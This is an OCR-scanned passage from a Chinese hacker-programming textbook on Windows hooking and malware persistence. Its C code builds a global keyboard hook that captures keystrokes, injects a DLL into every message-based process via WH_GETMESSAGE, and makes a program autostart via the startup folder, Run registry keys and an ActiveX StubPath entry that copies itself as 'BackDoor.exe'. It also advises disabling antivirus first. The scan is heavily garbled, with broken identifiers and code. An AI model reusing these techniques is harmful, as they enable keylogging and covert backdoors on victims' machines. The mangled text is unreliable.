IAT 进行 HOOK。 如 果 是 显 式 调用 的 话 ， 以 上 的 例子 就 无 法 达到 HOOK 的 作用 了 。 当 可 执行 
文件 直接 通过 调用 LoadLibraryO 函 数 和 GetProcAddress() 函 数 来 使 用 某 个 函数 的 话 ， 上 面 的 
HOOK 代码 是 无 能 为 力 的 。 如 何 解决 这 样 的 问题 ， 答 案 是 要 对 LoadLibrary() 和 GetProcAddress() 
函数 也 进行 HOOK， 这 样 就 可 以 避免 对 DLL 的 显 式 加 载 和 对 函数 的 显 式 调用 。 





EE EE 记事 志 ， 


IE 有 ny 








图 7-33 询问 是 否 打 开 文 件 图 7-34 选择 “ 否 ” 后 的 提示 
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Windows 下 的 窗口 应 用 程序 是 基于 消息 驱动 的 ， 但 是 在 某 些 情况 下 需要 捕获 或 者 修改 消 
息 ， 从 而 完成 一 些 特殊 的 功能 。 对 于 捕获 消息 而 言 ， 无 法 使 用 IAT 或 mline Hook 之 类 的 方式 
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去 进行 捕获 ， 不 过 Windows 提供 了 专门 用 于 处 理 消息 的 钩子 函数 。 
7.4.1 钩子 原理 


Windows 下 的 应 用 程序 大 部 分 是 基于 消息 模式 机 制 的 ， 一 些 CUI 的 程序 不 是 基于 消息 的 。 
Windows 下 的 应 用 程序 都 有 一 个 消息 过 程 函数 ， 根 据 不 同 的 消息 来 完成 不 同 的 功能 。Windows 
操作 系统 提供 的 多 子 机 制 的 作用 是 用 来 截获 、 监 视 系 统 中 的 消息 。Windows 操作 系统 提供 了 
很 多 不 同 种 类 的 钧 子 ， 可 以 处 理 不 同 的 消息 。 

Windows 系统 提供 的 钩子 按照 挂钩 范围 分 为 局 部 钩子 和 全 局 钩子 。 局 部 钩子 是 针对 一 个 
线程 的 ， 而 全 局 钩子 则 是 针对 整个 操作 系统 内 基于 消息 机 制 的 应 用 程序 的 。 全 局 钧 子 需 要 使 
用 DLL 文件 ，DLL 文件 里 存放 了 钩子 函数 的 代码 。 

在 操作 系统 中 安装 全 局 钩子 以 后 ， 只 要 进程 接收 到 可 以 发 出 钧 子 的 消息 后 ， 全 局 钩子 的 
DLL 文件 会 被 操作 系统 自动 或 强行 地 加 载 到 该 进程 中 。 由 此 可 见 ， 设 置 消息 钩子 也 是 一 种 可 
以 进行 DLL 注入 的 方法 。 


7.4.2 ”钩子 函数 


上 面 已 经 简单 地 讲述 了 Windows 钩子 的 基本 原理 ， 现 在 来 介绍 Windows 下 的 钩子 函数 ， 
主要 有 3 个， 分 别 是 SetWindowsHookEx()、CallNextHookEx() 和 UnhookWindowsHookEx()。 
下 面 介绍 这 些 函 数 的 使 用 方法 。 

SetWindowsHookEx() 函 数 的 定义 如 下 : 


HHOOK SetWindowsHookEx'( 
int idHook, 

HOOKPROC lpfn, 
HINSTANCE hMod, 

DWORD dwThreadId 





于 
该 函数 的 返回 值 为 一 个 钧 子 句 柄 。 这 个 函数 有 4 个 参数 ， 下 面 分 别 进行 介绍 。 

lpfn: 该 参数 指定 为 Hook 函数 的 地 址 。 如 果 dwThreadId 参数 被 赋值 为 0， 或 者 被 设置 为 一 
个 其 他 进程 中 的 线程 ID， 那么 jpfn 则 属于 DLL 中 的 函数 过 程 。 如 果 dwThreadId 为 当前 进程 中 
的 线程 ID， 那 么 Ipfh 可 以 是 指向 当前 进程 中 的 函数 过 程 ， 也 可 以 是 属于 DLL 中 的 函数 过 程 。 

hMod: 该 参数 指定 钩子 函数 所 在 模块 的 模块 句柄 。 该 模块 句柄 就 是 lpfn 所 在 的 模块 的 名 
柄 。 如 果 dwThreadId 为 当前 进程 中 的 线程 [D， 而 且 lpfh 所 指向 的 函数 在 当前 进程 中 ， 那 么 
hMod 将 被 设置 为 NULL。 

dwThreadId: 该 参数 设置 为 需要 被 挂 钓 的 线程 的 ID 号 。 如 果 设 置 为 0， 表示 在 所 有 的 线 
程 中 挂钩 (这 里 的 “所 有 的 线程 ”表示 基于 消息 机 制 的 所 有 的 线程 )。 如 果 指 定 为 具体 的 线程 
的 D 号 ， 表 示 要 在 指定 的 线程 中 进行 挂钩 。 该 参数 影响 上 面 两 个 参数 的 取 值 。 该 参数 的 取 
值 决定 了 该 钩子 属于 全 局 钧 子 ， 还 是 局 部 钩子 。 

idHook: 该 参数 表示 钧 子 的 类 型 。 由 于 钧 子 的 类 型 非常 多 ， 因 此 放 在 所 有 的 参数 后 面 进 
行 介绍 。 下 面 介绍 几 个 常用 到 的 钧 子 ， 也 可 能 是 读者 比较 关心 的 几 个 类 型 。 

1. WH_GETMESSAGE 

安装 该 钩子 的 作用 是 监视 被 投递 到 消息 队列 中 的 消息 。 也 就 是 当 调 用 GetMessage() 或 
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PeekMessage() 函 数 时 ， 函 数 从 程序 的 消息 队列 中 获取 一 个 消息 后 调用 该 钩子 。 
WH GETMESSAGE 钩子 函数 的 定义 如 下 : 


LRESULT CALLBACK GetMsgProc! 


int code, // 钩子 编码 
WPARAM wParam; // 移 除 选 项 
LPARAM lParam /7/ 消息 

); 

2. WH_MOUSE 


安装 该 钩子 的 作用 是 监视 鼠标 消息 。 该 钩子 函数 的 定义 如 下 : 


LRESULT CALLBACK MousePzroc( 


int ncode， // 钩子 编码 
WPARAM wParam, // 消息 标识 符 
LPARAM lParam // 鼠标 的 坐标 


) 
3. WH_KEYBOARD 


安装 该 钩子 的 作用 是 监视 键盘 消息 。 该 钩子 函数 的 定义 如 下 : 


LRESULT CALLBACK ee 
int code, // 钩子 编码 
WPARAM wParam, // 虚拟 键 编码 
LPARAM lParam // 按键 信息 
rh WH_DEBUG 


安装 该 钩子 的 作用 是 调试 其 他 钩子 的 钩子 函数 。 该 钧 子 函数 的 定义 如 下 : 


LRESULT CALEBACK DebugProc!( 


int nCode; // 钩子 编码 
WEARAM wParam, // 钩子 类 型 
LPARAM lParam // 调试 信息 


其 他 的 钧 子 类 型 请 读者 参考 MSDN。 从 上 面 的 这 些 钧 子 函数 定义 可 以 看 出 ， 每 个 钧 子 函 
数 的 定义 都 是 一 样 的 。 每 种 类 型 的 钧 子 监 视 、 截 获 的 消息 不 同 。 虽 然 它们 的 定义 都 是 相同 的 ， 
但 是 函数 参数 的 意义 是 不 同 的 。 由 于 篇 幅 所 限 ， 每 个 函数 的 具体 意义 请 参考 MSDN， 其 中 有 
最 为 详细 的 介绍 。 
接着 介绍 跟 钧 子 有 关 的 另外 一 个 函数 : UnhookWindowsHookEx()， 其 定义 如 下 : 
BOOL UnhookWindowsHookEx'( 
HHOOK hhk ”// 钩子 函数 的 句柄 
这 个 函数 是 用 来 移 除 先前 用 SetWindowsHookEx() 安 装 的 钧 子 。 该 函数 只 有 一 个 参数 ， 是 
钧 子 句 柄 ， 也 就 是 调用 该 函数 通过 指定 的 钩子 句柄 来 移 除 与 其 相应 的 钩子 。 
在 操作 系统 中 ,可 以 多 次 反复 地 使 用 SetWindowsHookEx() 函 数 来 安装 钧 子 , 而 且 可 以 安 
装 多 个 同样 类 型 的 钩子 。 这样 ， 钧 子 就 会 形成 一 条 钩子 链 , 最 后 安装 的 钩子 会 首先 截获 到 消息 。 
当 该 钩子 对 消息 处 理 完毕 以 后 ， 会 选择 返回 ， 或 者 选择 把 消息 继续 传递 下 去 。 在 通常 情况 下 ， 
如 果 为 了 屏蔽 消息 , 则 直接 在 钩子 函数 中 返回 一 个 非 零 值 。 比如 要 在 自己 程序 中 屏蔽 鼠标 消息 ， 
则 在 安装 的 鼠标 钩子 函数 中 直接 返回 非 零 值 即 可 。 如 果 为 了 消息 在 经 过 钧 子 函 数 后 可 以 继续 
传达 到 目标 窗口 ， 必 须 选 择 将 消息 继续 传递 。 使 消息 能 继续 传递 的 函数 的 定义 如 下 : 
LRESULT CallNextHookEx( 
HHOOK hhk, // 当前 钧 子 的 句柄 
int nCode, yh 亿 间 八仙 时 到 数 玖 全 于 册 操 
WPARAM wParam, // 传递 给 钓 子 函数 的 值 


LPARAM lParam /7 传递 给 钩子 函数 的 值 
) > 
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该 函数 有 4 个 参数 。 第 一 个 参数 是 钧 子 句 顶 ， 就 是 调用 SetWindowsHookEx() 函 数 的 返回 
值 ， 后 面 3 个 参数 是 钩子 函数 的 参数 ， 直 接 依次 抄 过 来 即 可 。 例 如 : 


HHOOK g Hook = SetWindowsHook(....)}? 


LRESULT CALLBACK GetMsgProc!( 
int code, // 钩子 编码 
WPARAM wParam, // 移 除 选项 
LPARAM lParam /7/ 消息 
) 
return CallNextHookEx(g Hook, code, wParam, lParam); 
} 


7.4.3 ”钩子 实例 


Windows 钩子 的 应 用 比较 广 。 无 论 是 安全 产品 还 是 恶意 软件 ， 甚 至 是 常规 软件 ， 都 会 用 
到 Windows 提供 的 钩子 功能 。 

1. 全 局 键盘 钩子 

下 面 来 写 一 个 可 以 截获 键盘 消息 的 钧 子 程序 ， 其 功能 非常 简单 ， 就 是 把 按 下 的 键 对 应 的 
字符 显示 出 来 。 既 然 要 截获 键盘 消息 ， 那 么 肯定 是 截获 系统 范围 内 的 键盘 消息 ， 因 此 需要 安 
装 全 局 钩子 ， 这 样 就 需要 DLL 文件 的 支持 。 先 来 新 建 一 个 DLL 文件 , 在 该 DLL 文件 中 需要 
定义 两 个 导出 函数 和 两 个 全 局 变量 ， 定 义 如 下 : 


extern "C" _declspec(dllexport) VOID SetHookOn(); 
extern "C” declspec(dlliexport) VOID SetHookOft():; 


// 钩子 句柄 

HHOOK 可 Hook = NULL; 
//_DLL 模块 句柄 

HINSTANCE g_Inst = NULL; 


在 DIIMain() 函 数 中 ， 需 要 保存 该 DLL 模块 的 句柄 ， 以 方便 安装 全 局 钩子 。 代 码 如 下 : 
BOOL APIENTRY DllMain( HANDLE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 
) 


// 保存 5LL 的 模块 句柄 
g_Inst = (HINSTANCE)hModule; 


return TRUE; 
} 


安装 与 卸载 钧 子 的 函数 如 下 : 


VOID SetHookon () 


// 安装 钩子 
g_Hook = SetNindoWwWsHookEx(WH KEYBORARD，KeyboardEroc，， g_Inst, 0) 7 
} 


VOID SetHookOff 1() 


// 证 载 多 子 
UnhookWindowsHookEx (g Hook) 
} 
对 于 Windows 钩子 来 说 ， 上 面 的 这 些 步 骤 基 本 上 都 是 必需 的 ， 或 者 是 差别 不 大 ， 关 键 在 


于 钩子 函数 的 实现 。 这 里 是 为 了 获取 键盘 按 下 的 键 ， 钩 子 函数 如 下 : 
全 全 天 KeyboazrdProc( 
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int code, // 钩子 编码 
WPARAM wParam, // 虚拟 键 编 
LPARAM lParam // 按 建 信息 


#3 《 Gude < QO) 
1 

return CallNextHookEx(g Hook, code, wParam, lParam); 
} 


if ( code == HC ACTION && lParam > 0 ) 

{ 
char szBuf [MAXBYTE] = { 0 }; 
GetRKeyNameText (lParam, szBuf, MAXBYTE); 
MessageBox (NULL, szBuf, NULL, MB_OK); 

} 


return CallNextHookEx(g Hook, code, wParam, lParam); 


} 

关于 钩子 函数 ， 这 里 简单 地 解释 一 下 ， 首 先是 进入 钩子 函数 的 第 一 个 判断 。 
Bs oodel < Oy 

, : return CallNextHookEx(g Hook; code,; wParam, lParam); 


} 
如 果 code 的 值 小 于 0， 则 必须 调用 CalINextHookEx()， 将 消息 继续 传递 下 去 ， 不 对 该 消 
息 进 行 处 理 ， 并 返回 CallNextHookEx() 函 数 的 返回 值 。 这 一 点 是 MSDN 上 要 求 这 么 做 的 。 


if ( code == HC ACTION && lParam > 0 ) 

{ 
char szBuf [MAXBYTE] = { 0 }; 
GetKeyNameText (lParam, SzZBuf,;, MAXBYTE); 
MessageBox (NULL, szBuf, NULL, MB OK); 

} 


如 果 code 等 于 HC_ACTION， 表 示 消 息 中 包含 按 
键 消息 ; 如 果 为 WM_KEYDOWN， 则 显示 按键 对 应 的 
文本 。 

将 该 DLL 文件 编译 连接 。 为 了 测试 该 DLL 文件 ， 
新 建 一 个 MFC 的 Dialog 工程 ， 添 加 两 个 按钮 ， 如 图 7-35 
所 示 。 

分 别 对 这 两 个 按钮 添加 代码 ， 具 体 如 下 ; i 


void CHookTestD1g: :OnButtonil () 


// 在 这 里 添加 控制 通知 的 处 理 程序 
SetHookOn (); 





} 
void CHookTestD1lg: :OnButton2 () 


// 在 这 里 添加 控制 通知 的 处 理 程序 
SetHookOff()» 
} 


直接 调用 DLL 文件 导出 这 两 个 函数 , 不 过 在 使 用 之 前 要 先 对 这 两 个 函数 进行 声明 , 否则 
编译 器 因 无 法 找到 这 两 个 函数 的 原型 而 导致 连接 失败 。 定 义 如 下 : 


extern "C" VOID SetHookon () 7 
extern “C" VOID SetHookOff (); 


进行 编译 连接 ， 提 示 出 错 ， 内 容 如 下 : 
Linkingd .= 
HookTestD1lg.obj : error LNK2001: unresolved external symbol _SetHookOn 


297 
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HookTestDlg.obj : error LNK2001; unresolved external Symbol SetHookOff 
Debug/HookTest.exe : fatal error LNK1120:; 2 unresolved externals 
Error executing link.exe. 


HookTest .exe - 3 error(s), 0 warning(s) 
从 给 出 的 提示 可 以 看 出 是 连接 错误 ， 找 不 到 外 部 的 符号 。 将 DLL 编译 连接 后 生成 的 DLL 
文件 和 LIB 文件 都 复制 到 测试 工程 的 目录 下 ， 并 将 LIB 文件 添加 到 工程 中 。 在 代码 中 添加 如 


下 语句 : 
tpragma comment (lib, KeyBoradHookTest) 
再 次 连接 ， 成 功 ! 


运行 测试 程序 ， 并 单 击 “HookOn” 按 钮 ， 随 便 按 下 键盘 上 的 任意 一 个 键 , 会 出 现 提 示 对 
话 框 ， 如 图 7-36 所 示 。 


| -局 
序 将 捕获 到 按键 。 到 此 , 键盘 钩子 的 例子 程序 就 完成 了 。 本 


2. 低级 键盘 钩子 

数据 防 泄露 软件 通常 会 禁止 PrintScreen 键 ， 防 止 通 
过 截屏 将 数据 保存 为 图 片 而 导致 泄密 。 这 类 软件 想 要 实 
现 是 比较 简单 的 ， 但 是 想 要 将 功能 做 得 强大 些 ， 还 是 需 
要 下 功夫 的 。 数 据 防 泄露 的 软件 除了 要 有 兼容 性 好 的 底层 驱动 的 设计 ， 还 要 有 完善 的 规则 设 
置 。 此 外 就 是 需要 软件 安全 人 员 对 其 进行 各 种 各 样 的 攻击 ， 避 免 数 据 防 泄露 软件 因为 各 种 各 
样 的 原因 而 被 心怀 恶意 者 突破 。 

这 里 介绍 如 何 禁 止 PrintScreen 键 。 其 实 很 简单 ， 只 要 安装 低级 键盘 钩子 (WH_KEYBO 
ARD LL) 就 可 以 搞定 。 普 通 的 键盘 钩子 (WH KEYBOARD) 是 无 法 过 滤 一 些 系统 按键 的 。 
在 低级 键盘 钩子 的 回调 函数 中 ， 判 断 是 否 为 PrintScreen 键 ， 如 果 是 ， 则 直接 返回 TRUE (前 
面 提 到 ， 如 果 想 屏蔽 某 个 消息 的 话 ， 那 么 在 钩子 函数 中 对 该 消息 进行 处 理 后 ， 直 接 返 回 一 个 
非 零 值 )， 如 果 不 是 ， 则 传递 给 钩子 链 的 下 一 处 。 

代码 如 下 : 

extern "C" declspecl(dllexport) BOOL SetHookon() 


{ 
if ( g hHook != NULL ) 
{ 





图 7-36 ”截获 到 的 键盘 输入 


return FALSE; 
TY 
ghHook = SetWindowsHookEx (WH_KEYBOARD LL, LowLevelKeyboardProc, 9 hIins, NULL); 
if ( NULL == g hHook ) 
{ 
MessageBox (NULL，" 安 装 钓 子 出 错 !",， "error", MB_ICONSTOP); 
return FALSE; 
} 


return TRUE; 
} 


extern "C" _ declspec(dllexport) BOOL SetHookOff'() 
if ( 9hHook == NULL ) 
{ 
return FALSE; 


} 
UnhookWindowsHookEx (g_hHook); 
g_hHook = NULL; 








7.4 Windows 钧 子 函数 





return’ TRUE 
} 


LRESULT CALLBACK LowLevelKeyboardProc!( 
int nCode, WPARAM wParam, LPARAM lParam) 
{ 
KBDLLHOOKSTRUCT *Key, Info = (KBDLLHOOKSTRUCT*)1lParam; 


if ( HC ACTION == nCode ) 
if ( WM KEYDOWN == wParam || WM_ SYSKEYDOWN == wParam ) 
: if '( Key. Info~->vkCode == VK, SNAPSHOT ) 
roturny TRUE: 
} 


} 


return CallNextHookEx (yg hHook, nCode, wParam, lParam); 


} 

代码 量 非 常 短 ， 然 而 ， 就 是 这 短 短 的 代码 阻止 了 数据 的 泄露 。 当 然 ， 对 于 一 个 攻击 者 来 
说 ， 这 个 代码 无 法 保护 数据 ， 这 种 保护 也 就 很 脆弱 了 。 任 何 的 保护 都 有 突破 的 办 法 ， 攻 击 无 
处 不 在 ， 攻 击 者 会 尝试 任何 手段 突破 所 有 的 保护 。 这 里 只 是 介绍 底层 键盘 钩子 ， 更 多 话题 不 
进行 讨论 。 

3.， 使 用 钩子 进行 DLL 注入 

Windows 提供 的 钩子 类 型 非常 多 ， 其 中 一 种 类 型 的 钩子 非常 实用 ， 那 就 是 WH_GETME 
SSAGE 钧 子 。 它 可 以 很 方便 地 将 DLL 文件 注入 到 所 有 的 基于 消息 机 制 的 程序 中 。 

在 有 些 情况 下 ， 需 要 DLL 文件 完成 一 些 功能 ， 但 是 完成 功能 时 需要 DLL 在 目标 进程 的 
空间 中 。 这 时 ， 就 需要 使 用 WH_GETMESSAGE 消息 把 DLL 注入 到 目标 的 进程 中 。 代 码 非 
常 简单 ， 这 里 直接 给 出 DLL 文件 的 代码 ， 具 体 如 下 : 


#include <windows.h> 











extern "CO declspec(dllexport)'VOITD SetHookOn(): 
extern nc declspec(dllexport) VOID SetHookOff(); 


HHOOK g_ HHook = NULL; 
HINSTANCE 9 hinst = NULL; 


VOID DoSomeThing () 
{ 
/* 


自己 要 实现 功能 的 代码 


BOOL WINAPI DilMain ( 
HINSTANCE hinstDIL， // ID 模块 的 句柄 


DWORD fdwReasony // 调用 函数 的 原因 
LPVOID lpvReserved, // 保留 的 


switch ( fodwReason ) 
{ 
case DLL PROCESS ATTACH: 
{ 
ghIinst = hinstDLL; 
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DosomeThing(); 


break; 

第 } 
7 } 
= 
于 return TRUE7 

} 
黑 
客 LRESULT CALLBACK GetMsgproct 
局 irnt code, // 钩子 编码 
手 WPARAM WwWEatam， // 移 除 选项 
的 LPARAM lParam  // 消息 
) 
© { 
© return CallNextHookEx'{(g_ HHook, code, wParam, lParam); 
人 } 
术 VOID SetHookOn () 

' 

g_HHook = SetWindowsHookEx (WH_GETMESSAGE, GetMsgProc, g hinst, 0)? 
} 
[SS | 


VOID SetHookOff () 
{ 
UnhookWindowsHookEx (g_ HHooKk); 
} 
整个 代码 就 是 这 样 。 读 者 只 要 知道 ， 在 需要 DLL 大 范围 地 注入 到 基于 消息 的 进程 中 时 ， 
可 以 使 用 这 种 方法 。 


7.5 ”总结 
在 Windows 操作 系统 下 ， 挂 钩 的 方法 非常 多 ， 这 里 只 介绍 了 Inline Hook、IAT Hook 和 


Windows 钩子 等 ， 并 且 都 通过 简单 的 实例 进行 了 讲解 分 析 。 这 些 都 是 较为 常见 的 挂钩 方法 ， 
应 用 面 非常 广泛 ， 希 望 读 者 在 掌握 技术 之 后 发 挥 更 多 的 想法 去 加 以 应 用 。 
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通过 前 面 章 节 所 学 到 的 知识 ， 读 者 应 该 已 经 掌握 了 一 定 的 编程 及 安全 的 相关 知识 。 本 章 
是 一 个 综合 性 实例 的 章节 ， 以 帮助 读者 复习 和 巩固 前 面 所 学 的 知识 。 本 章 旨 在 起 到 抛砖引玉 
的 作用 ， 以 便 读 者 将 所 学 到 的 知识 真正 应 用 到 实际 中 。 和 希望 读者 可 以 在 安全 领域 中 找到 自己 
感 兴趣 的 方向 并 进行 深入 全 面 的 学 习 和 研究 ， 为 以 后 开发 安全 的 系统 打 基 础 。 


8.1 ”恶意 程序 编程 技术 痢 丁 


恶意 程序 通常 是 指 带 有 攻击 意图 的 一 段 程序 ， 主 要 包括 木马 、 病 毒 和 蠕虫 等 。 亚 意 程序 
的 编写 是 违反 道德 和 法 律 的 ， 这 里 只 是 进行 学 习 。 在 前 面 的 章节 中 说 过 ， 黑 客 编程 和 普通 编 
程 本 质 上 都 是 编程 ， 只 是 侧重 点 不 同 。 为 了 学 习 编程 、 防 御 黑 客 编程 攻击 ， 就 必须 对 恶意 程 
序 的 编写 有 所 了 解 。 木 马 、 病 毒 、 虹 虫 等 各 有 不 同 ， 但 是 这 里 不 进行 具体 的 区 分 ， 因 为 这 些 
恶意 软件 虽然 名 词 和 主要 功能 各 有 不 同 ， 但 是 它们 所 使 用 的 技术 都 是 交叉 的 ， 而 不 是 相互 独 
立 的 。 


8.1.1 恶意 程序 的 自 启 动 技术 


每 当 黑客 入 侵 计 算 机 以 后 ， 为 了 下 次 的 登录 都 会 安装 一 个 后 门 或 者 木马 。 当 计算 机 关机 
或 重启 时 ， 所 有 的 进程 都 会 被 关闭 。 那 么 后 门 或 者 木马 是 如 何在 计算 机 重启 以 后 仍然 继续 运 
行 的 呢 ? 下 面 先 来 讨论 如 何 实现 恶意 程序 的 自 启动 。 

恶意 程序 的 自 启动 的 实现 方法 很 多 ， 下 面 只 介绍 几 种 常见 的 方法 。 

1， 启动 文 件 夹 

在 Windows 系统 下 ， 有 一 个 文件 夹 是 专门 用 来 存放 启动 文件 的 。 该 文件 夹 的 位 置 如 图 8-1 
所 示 。 Pe 相让 回 Mierosoft Visual Studia 2005 | 

在 “启动 ”菜单 处 单 击 鼠 标 右键 , 然后 选 ” 轩 一 a 
择 “ 属 性 ”命令 ， 就 可 以 看 到 启动 文件 来 在 硬 ”图 忆 sg 加 四 
盘 上 的 具体 位 置 ， 如 “系统 盘 \Documents and 1 
Settings\< 用 户 名 六 「 开 始 」 菜单 \ 程 序 " 通 图 8-1 启动 文件 夹 的 位 轩 
常情 况 下 ，< 用 户 名 > 是 当前 用 户 的 用 户 名 ，Windows 为 每 个 用 户 创建 了 一 个 文件 夹 。 如果 想 
要 所 有 的 用 户 在 启动 时 都 运行 某 个 程序 ， 需 要 使 用 的 文件 夹 为 “All Users”。 那 么 ， 也 就 是 把 
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需要 启动 的 程序 放 到 “系统 盘 \Documents and Settings\All Users\ [开始 」 菜单 \ 程 序 ” 位 置 下 。 
该 程序 的 实现 方法 非常 简单 。 基 本 上 在 前 面 已 经 介绍 过 该 程序 的 实现 方法 ， 下 面 给 出 它 的 部 
分 代码 。 
GetSsystemDirectory (szSysbath, MAX., PATH) 
strncpy(szStartDirectory, szSysPath, 3); 
streatlszSstarthirectory, 
"Documents and Settings\\All Users\\ [开始 」 菜单 \\ 程 序 \\ 启 动 \\test.exe"); 


GetModuleFileName (NULL, szFileName, MAX PATH); 
CopyFile (szFileName, szStartDirectory, FALSE); 


打开 All Users 下 的 启动 目录 ， 也 就 是 上 面 的 “系统 盘 :\Documents and Settings\All Users\ 
[开始 」 菜单 \ 程 序 ” 位 置 ， 然 后 编译 连接 并 运行 程序 ， 可 以 看 到 在 启动 目录 下 多 了 一 个 “test.exe” 
程序 。 

通过 前 面 介 绍 得 知 ， 启 动 文件 夹 实质 上 有 两 个 ， 一 个 是 “All Users”， 另 一 个 是 属于 具体 
某 个 用 户 的 。 可 以 通过 遍历 所 有 的 用 户 目录 ， 将 要 启动 的 恶意 程序 逐一 放 进 去 也 是 一 种 方法 ， 
只 是 显得 比较 笨拙 。 但 是 ， 为 了 恶意 程序 的 启动 ， 任 何方 法 都 应 该 去 尝试 。 

2. 注册 表 启 动 

注册 表 启 动 也 是 一 种 很 常见 的 启动 方法 ， 而 且 在 注册 表 中 可 以 用 来 进行 启动 的 位 置 非常 
多 。 这 里 介绍 几 个 在 注册 表 中 可 以 完成 自 启动 的 注册 表 位 置 。 

(1) Run 注册 表 键 。 


HKCU \Software\Microsoft\Windows\CurrentVersion\Run 
HKLM \Software\Microsoft\Windows\CurrentVersion\Run 
(2) Boot Execute。 


HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute 
HKLM\System\CurrentControlSet\Control\session Manager\SetupExecute 
HKLM\System\CurrentControlSet\Control\Session Manager\Execute 
HKLM\System\CurrentControlSet\Control\Session Manager\S0InitialCommand 


(3) Load 注册 表 键 。 


HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 
当然 ， 在 注册 表 下 绝对 不 只 有 这 么 几 个 位 置 能 
够 使 程序 跟随 系统 自动 启动 ， 这 只 是 注册 表 下 可 以 








WH Retiability 
让 程序 随机 启动 位 置 的 “冰山 一 角 ”。 打开 一 个 注 “| “am 
册 表 项 ， 如 图 8-2 所 示 。 none 


同样 ， 下 面 来 完成 一 个 通过 写 入 注册 表 进行 自 图 8-2 Run 注册 表 键 中 的 启动 项 
启动 的 例子 程序 ， 其 部 分 代码 如 下 : 


GetModuleFileName (NULL, szFileName, MAX PATH) ; 


HKEY hKey = NULE; 
RegopenKey (HKEY LOCAL MACHINE, 
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 
shKRey); 
RegSetValueEx (hKey, 
Htest", 
0， 
REG SH, 
(const unsigned char *)szFileName, 
strlen(szFileName) + sizeof (char)); 
RegCloseKey (hKevy); 


将 该 代码 编译 连接 并 运行 ， 然 后 打开 注册 表 中 写 入 的 位 置 查 看 ， 会 发 现 已 经 把 它 写 入 了 
注册 表 。 当 下 次 开机 时 ， 它 就 会 随机 启动 。 





中 
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EDy 注 : 在 进行 写 注 册 表 时 需要 停止 杀毒 软件 及 相关 的 系统 防护 软件 ， 否 则 会 有 相应 的 提示 或 操作 被 拦截 而 导 
致 失败 。 


3，ActvieX 启动 

ActiveX 是 一 种 组 件 技术 ， 它 被 注册 在 系统 中 ， 被 其 他 应 用 程序 调用 ， 其 注册 登记 的 地 方 
在 Windows 的 注册 表 中 。ActiveX 启动 程序 的 方式 是 将 程序 以 相 类 似 的 方式 注册 登记 到 注册 
表 的 相关 位 置 中 ， 从 而 使 得 应 用 程序 可 以 在 开机 的 同时 完成 自 启动 的 功能 。 

通过 描述 可 以 得 知 ， 这 种 启动 方法 也 可 以 算是 通过 修改 注册 表 的 方式 进行 启动 ， 但 是 由 
于 这 种 方式 被 ActiveX 控件 所 使 用 ， 因 此 单独 把 它 归 为 一 类 。 但 是 ， 当 有 具体 应 用 和 编写 代码 
的 时 候 ， 仍 然 是 通过 注册 表 操 作 来 进行 的 。 

注册 表 的 HKEY LOCAL MACHINE\SoftWare\Microsoft\Active Setup\Installed Componen 
ts 即 为 注册 登记 ActiveX 的 位 置 ， 如 图 8-3 所 示 。 








全 i 11d0-948b-0080c74e7| 
个 {2C7339CF-2809-450183F3F350969 
{4466A840-CC51-11CF-AAFA-0OAA0O| 
外 {4469A842-CC51-11CF-AAFA-00AAOOS 
和 {+58A8S48-CC51-11CF-AAFA-O0AADO8| 
多 {5945c046-1e7d-11d1-be44-00c04fd91 
国 {66F52A52-394A-11d3-8153-00C0 丰 79 
3 17790769C-0471-11d2-AF11-00C04FA 











注册 的 ActiveX 



















注册 表 中 的 路 径 





一 人 9820200-EC8D-11cf-8635-00AA0056; 测 


图 8-3 ”ActiveX 键 在 注册 表 中 的 位 置 


在 该 注册 表 路 径 下 ， 有 诸多 形 如 {E0EDB497-B2F5-4b4f97EC-2362BC4CC50D} 的 子 键 ， 在 这 
个 子 键 下 有 一 个 StubPath 字符 串 类 型 的 键 值 ， 该 键 值 保存 了 开机 启动 的 文件 路 径 ， 如 图 8-4 所 示 。 





查看 了 收 意 夹 &) 帮助 












osoft | | [3] ( 献 认 】 REG SZ Themes Setup 
tet | [ab]ComponantID REG SZ Theme Component 
Clsidfeature | 更 IsInstalled REG_DWORD 0x00000001 {1) 
Declined Install Dn Demand IEvS | a 

FeatureComponentID | 
| Install Check | 


Installed Components | 
多 flo072CRC-8CC1-itDi-986E-00A0C95584 || 
合 {2179C5D3-EBFF-11CF-B6FD-0OAADDB4E2 | 

| 


22d6f312” 11dD-94ab-0080cT4e7 二 z 
ee 对 应 文件 的 路 径 


加 faaf36230-a269-11al-b5bf-0000f6osis || 
{3bf42070-b3b1l-11d1-b5c5-0000f80515 
{4278c270-a269-11d1-b5bf-0000f80515 
加 144BBAS40-CC51-11CF-AAFA-OOAANOBEO1 
外 HABBAB42-CC51- 11CF-AAFA-DOAADOB6DI 局 


_EDCE 丰 .| MACHINE SOPTWARE Mi cr oo UUN CLi ve ES Components\ C733 2009 4001 HIF F3000C922 


图 8-4 启动 对 应 的 文件 路 径 

















尝 悟 全 将 沿革 啊 钼 山 o 小 
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只 要 在 该 注册 表 路 径 下 增加 类 似 的 子 键 ， 并 添加 相应 的 StubPath 的 字符 串 键 值 ， 即 可 洪 


第 加 一 个 开机 启动 的 程序 。 编 写 相 应 的 代码 ， 有 具体 如 下 : 
8 #include <windows.h> 
章 
#define REG PATH "software\\microsoft\\active setup\\" \ 
黑 "Installed Components\\{EO0EDB497=B2F5-4b4f-97EC-2362BC4CC50D}" 
客 
了 nt mainl() 
编 i 
实 HKEY hkKey; 
例 LONG lRet = RegOpenKeyEx (HKEY CURRENT USER, 
剖 REG_PRATH， 


REG_OPTION_NON_ VOLATILE, 
KEY ATI_RACCESS7 
SnhKeYy) 


if ( 1lRet != ERROR_SUCCESS ) 
{ 


’ 


char szSelfFile[MAX PATH] = { 0 } 
= 


char szSystemPath [MAX PATH] 


GetSystemDirectory(szSystemPath, MAX PATH); 
strcat (szSystemPath, "\\BackDoor.exe"); 


GetModuleFileName (NULL, szSelfrFilje, MAX PATH); 
CopyFile (szSelfFile, szSystemPath, FALSE),; 


| lRet = RegCreateKeyEx'(HKEY LOCAL MACHINE, 

REG PATH, 

0, 

NULL, 
REG_OPTION NON VOLATILE, 
KEY ALL ACCESS, 

NULL, 

ghKRey, 

NULL); 


了 有 TRet, t= phRRORJSUCCHSS, ) 
{ 
returnlsl: 

: 

lRet = RegSetValueEx(hKey, "stubpath", 0, REG_SZ, 
(CONST ‘BYTE *)szSystempath, 
strlen(szSystemPpath) ); 

if ( lRet != ERROR SUCCESS ) 

{ 


RegCloseKey (hKey); 
